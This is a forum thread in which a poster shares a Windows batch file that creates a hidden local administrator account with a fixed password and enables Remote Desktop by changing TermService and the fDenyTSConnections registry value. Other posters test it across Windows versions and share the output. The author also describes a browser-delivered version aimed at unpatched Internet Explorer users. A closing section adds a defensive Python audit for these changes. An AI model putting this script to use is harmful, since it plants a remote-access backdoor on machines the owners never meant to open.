digip, posted January 25, 2010

I have tested this in Windows XP Pro and it works fine. It will not work in Home editions (obviously, no RDP settings, only remote assistance). What I would like someone to do is maybe try it on Server 2003, Vista and Windows 7 (above Home edition, needs RDP capabilities), as I do not have anything above Home edition for Vista/7 and don't have Server 2003 installed anywhere at the moment.

    ::: Tested to work on Windows XP Pro,
    ::: Will not work on Home edition (There is no TermServices for RDP, only Remote Assistance)
    ::: Might possibly work in Server 2003, but have not tried it yet.
    ::: Adds a user "stupid" with password "password"
    ::: Enables TermService and Remote Control (RDP) - DigiP
    ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    @echo off
    net user stupid password /add && net localgroup Administrators stupid /add
    SC config "TermService" start= "auto"
    NET START "Terminal Services"
    REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /F

Due to the forums wrapping text, the last two lines of code should be one line, space between /v and fDeny

Seph, posted January 25, 2010

Sure np man. Give us a few

EDIT: K. Ran through it with 2003 server and Win7. Though admittedly I didn't actually run the batch file on my actual win7 machine =P

2003 - Fine, worked perfectly.
Win7 - Going to assume it works fine. I walked through each command, looked like it would work fine. As well as the reg entry.

(lol at the user and pass btw)

digip (Author), posted January 25, 2010

In 7, check your system to see 1, did it add a new user as administrator, 2, is remote desktop enabled now (right click my computer, properties, remote settings). If so, what's your IP address ;) j/k. Be sure to delete the user from your system as well as disable the services again if not needed. Thanks for checking. I had a suspicion Server2003 would be just like XP since they are pretty much the same under the hood aside from the server's services and admin pack.

On a side note, I have this working as a sploit in Internet Explorer, using a wscript hosting flaw. On my system it prompts me if I want to run it (which of course I wouldn't other than for debugging and testing my own machine), but I'm sure there are some people out there with default installs of XP and IE with unpatched machines and even low IE security settings for Active-X and scripting. If those damn spyware apps can get in, then so will this. It's basically the same as the bat commands, just written for VBScript in the browser (and it does work in XP, and most likely Server 2003 now that you have confirmed it for me).

MRGRIM, posted January 25, 2010

Pretty neat script, I remember the first time I ever had to use the remote registry feature on a Server to edit the fDenyTSConnections, I tell you nothing is more fun than running "Shutdown" commands from a server command prompt.

Charles, posted January 25, 2010

Did you need someone to try it out on Server 2008?

digip (Author), posted January 25, 2010

> Did you need someone to try it out on Server 2008?

Sure, if you want, cause apparently this flaw for IE affects XP, Server2003, Vista and 7, although I wasn't able to get it to work on my wife's 7 box, I may have it locked down too tight to get in, cause I don't even get the prompt in IE8 to run the code, nor does it create any users on her system.

Charles, posted January 25, 2010

> Sure, if you want, cause apparently this flaw for IE affects XP, Server2003, Vista and 7, although I wasn't able to get it to work on my wife's 7 box, I may have it locked down too tight to get in, cause I don't even get the prompt in IE8 to run the code, nor does it create any users on her system.

I'll give it a shot when I get home tonight and post the results. I wonder if it would work on my 7 box since I haven't exactly locked anything down.

digip (Author), posted January 25, 2010

> I wonder if it would work on my 7 box since I haven't exactly locked anything down.

If it's home edition, won't work for RDP, but should for adding a user and term service.

Charles, posted January 25, 2010

Heh. I'm running Win 7 Ultimate (like an idiot, cuz I hardly use RDP, but I like having my local users and group applet... ) I'll probably install a copy of 7 and Vista in a VM and see what happens.

To do list: Install Server 2008, 7, Vista and run script.

Man I love VirtualBox. B)

555, posted January 25, 2010

So a batch file is pretty much just CMD commands listed in a certain way to perform what you want, right? I found this site pretty cool for learning advanced windows cmd commands: http://blog.commandlinekungfu.com/

To be honest I have not made a batch file since before windows existed and it was only DOS, or when the first windows came out up to my 386DX.

Charles, posted January 26, 2010

Ok here's the one for Windows Server 2008:

    C:\Users\Administrator\Documents>test.cmd
    The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements.
    More help is available by typing NET HELPMSG 2245.
    [SC] ChangeServiceConfig SUCCESS
    The service name is invalid.
    More help is available by typing NET HELPMSG 2185.
    The operation completed successfully.
    C:\Users\Administrator\Documents>

After disabling complexity requirements in GPO it worked, minus terminal services I think.

    C:\Users\Administrator\Documents>test.cmd
    The command completed successfully.
    The command completed successfully.
    [SC] ChangeServiceConfig SUCCESS
    The service name is invalid.
    More help is available by typing NET HELPMSG 2185.
    The operation completed successfully.
    C:\Users\Administrator\Documents>

It did enable remote desktop, and you can login with "stupid//password"

Next post will be for Vista.

Charles, posted January 26, 2010

With UAC enabled:

    C:\Users\User\Documents>test
    System error 5 has occurred.
    Access is denied.
    [SC] OpenService FAILED 5:
    Access is denied.
    System error 5 has occurred.
    Access is denied.
    ERROR: Access is denied.
    C:\Users\User\Documents>

With UAC disabled:

    C:\Users\User\Documents>test.cmd
    The command completed successfully.
    The command completed successfully.
    [SC] ChangeServiceConfig SUCCESS
    The requested service has already been started.
    More help is available by typing NET HELPMSG 2182.
    The operation completed successfully.
    C:\Users\User\Documents>

digip (Author), posted January 26, 2010

> The command completed successfully.
> The command completed successfully.
> [SC] ChangeServiceConfig SUCCESS
> The service name is invalid.
>
> It did enable remote desktop, and you can login with "stupid//password"

In server 2008, can you open services.msc and scroll down for Terminal Services, or something similar. I need to know the actual name of the service description. It seems that it still uses sc TermService but the actual net command uses a different name to start the service, although it looks like your system already had it running since RDP was able to start.

Charles, posted January 26, 2010

Windows 7:

With UAC enabled:

    C:\Users\user\Documents>test.cmd
    System error 5 has occurred.
    Access is denied.
    [SC] OpenService FAILED 5:
    Access is denied.
    The service name is invalid.
    More help is available by typing NET HELPMSG 2185.
    ERROR: Access is denied.
    C:\Users\user\Documents>

Without UAC enabled:

    C:\Users\user\Documents>test.cmd
    The command completed successfully.
    The command completed successfully.
    [SC] ChangeServiceConfig SUCCESS
    The service name is invalid.
    More help is available by typing NET HELPMSG 2185.
    The operation completed successfully.
    C:\Users\user\Documents>

Seph, posted January 26, 2010

> In 7, check your system to see 1, did it add a new user as administrator, 2, is remote desktop enabled now (right click my computer, properties, remote settings). If so, what's your IP address ;) j/k. Be sure to delete the user from your system as well as disable the services again if not needed. Thanks for checking. I had a suspicion Server2003 would be just like XP since they are pretty much the same under the hood aside from the server's services and admin pack.

My ip is lol.lol.lol.XD and RDP port is open and forwarded. :P

2003 machine was a vbox testing server so I really didn't care. Like I said, I didn't actually run the script on my host, I only checked if your syntax was correct. Didn't actually add anything.

digip (Author), posted January 26, 2010

I wonder if Vista and up don't let you disable Terminal Services, that it is always on other than sc TermService set to auto, disabled, etc. If that's the case, then for Vista, 7, and 2008, all I'll need to do is create the user and enable RDP. At least nothing gets broken in the process either, so I can just leave this as is for generic means.

Charles, posted January 26, 2010

Ok. For Windows 7:

There is no Terminal Services service. There is one that is called "remote desktop services." It's named "TermService".

Got it to start by using this command:

    C:\Users\user\Documents>SC config TermService start= auto
    [SC] ChangeServiceConfig SUCCESS

Windows Vista:

There is a service named "Terminal Services"; it is named "TermService".

Same command got it running:

    SC config TermService start= auto

Also for Vista and W7, UAC either needs to be disabled or you need to be in an admin command shell..err window... w/e.
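
An added example, not part of any post in this thread: a read-only audit for the three changes the batch file in the first post makes (a new member of the local Administrators group, TermService set to start automatically, fDenyTSConnections set to 0). It parses the text output of the three query commands named in the comments; the sample outputs and the list of expected administrators are constructed for illustration.

```python
import re

# Constructed sample output (not captured from a real host) of three read-only queries:
#   net localgroup Administrators
#   sc qc TermService
#   reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
SAMPLE_GROUP = """Alias name     Administrators
Members

-------------------------------------------------------------------------------
Administrator
stupid
The command completed successfully.
"""
SAMPLE_SC = """[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TermService
        START_TYPE         : 2   AUTO_START
"""
SAMPLE_REG = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0
"""

def admin_members(net_output):
    """Names listed between the dashed rule and the completion line."""
    lines = net_output.splitlines()
    start = next(i for i, l in enumerate(lines) if l.startswith("-----")) + 1
    return [l.strip() for l in lines[start:]
            if l.strip() and not l.startswith("The command completed")]

def audit(net_output, sc_output, reg_output, expected_admins):
    """Return findings for the three settings the thread's batch file changes."""
    findings = []
    allowed = {a.lower() for a in expected_admins}  # account names are case-insensitive
    for name in admin_members(net_output):
        if name.lower() not in allowed:
            findings.append("unexpected local administrator: " + name)
    m = re.search(r"START_TYPE\s*:\s*(\d+)", sc_output)
    if m and m.group(1) == "2":  # 2 = AUTO_START, what 'start= auto' sets
        findings.append("TermService start type is AUTO_START")
    m = re.search(r"fDenyTSConnections\s+REG_DWORD\s+0x([0-9a-fA-F]+)", reg_output)
    if m and int(m.group(1), 16) == 0:  # 0 = Remote Desktop connections allowed
        findings.append("fDenyTSConnections is 0: RDP connections allowed")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_GROUP, SAMPLE_SC, SAMPLE_REG, ["Administrator"]):
        print(finding)
```

On a live host, pass in the output of the three commands captured from an elevated prompt, with the list of accounts that are supposed to be local administrators.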